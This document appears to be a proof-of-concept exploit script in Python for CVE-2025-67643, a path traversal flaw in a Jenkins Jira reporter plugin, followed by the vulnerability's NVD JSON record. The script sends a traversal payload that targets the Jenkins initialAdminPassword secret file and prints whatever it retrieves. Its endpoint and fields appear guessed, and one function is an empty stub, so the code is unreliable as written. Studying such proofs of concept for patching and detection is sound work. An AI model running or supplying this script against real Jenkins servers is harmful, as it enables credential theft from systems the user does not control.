CVE-2025-67643

# CVE-2025-67643 PoC - Path Traversal in Jenkins Redpen Plugin # This PoC demonstrates how an attacker with Item/Configure permission # can read arbitrary files from Jenkins controller workspace import requests import json JENKINS_URL = "http://target-jenkins-server:8080" TARGET_PLUGIN = "/redpen-jira/uploadArtifact" # Authentication with Item/Configure permission AUTH_TOKEN = "base64_encoded_user:api_token" def exploit_path_traversal(): """ Exploit the path traversal vulnerability to read sensitive files """ headers = { "Authorization": f"Basic {AUTH_TOKEN}", "Content-Type": "application/json" } # Path traversal payload to read Jenkins credentials traversal_path = "../../../../var/jenkins_home/secrets/initialAdminPassword" payload = { "artifactPath": traversal_path, "jobName": "vulnerable-job", "buildNumber": 1 } try: response = requests.post( f"{JENKINS_URL}{TARGET_PLUGIN}", headers=headers, json=payload, timeout=30 ) if response.status_code == 200: print("[+] Successfully exploited path traversal vulnerability") print(f"[+] Retrieved content: {response.text}") return response.text else: print(f"[-] Exploitation failed: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None def check_plugin_version(): """ Check if target is running vulnerable version """ # Query Jenkins plugin manager API pass if __name__ == "__main__": print("CVE-2025-67643 Path Traversal Exploitation") print("Target: Jenkins Redpen - Pipeline Reporter for Jira Plugin") exploit_path_traversal()

{"cve": {"id": "CVE-2025-67643", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.870", "lastModified": "2025-12-17T17:19:54.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins Redpen - Pipeline Reporter for Jira Plugin 1.054.v7b_9517b_6b_202 and earlier does not correctly perform path validation of the workspace directory while uploading artifacts to Jira, allowing attackers with Item/Configure permission to retrieve files present on the Jenkins controller workspace directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:redpen_-_pipeline_reporter_for_jira:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "1.054.v7b_9517b_6b_202", "matchCriteriaId": "690EE16A-A47C-402B-A56D-D6EA361A2A22"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3290", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}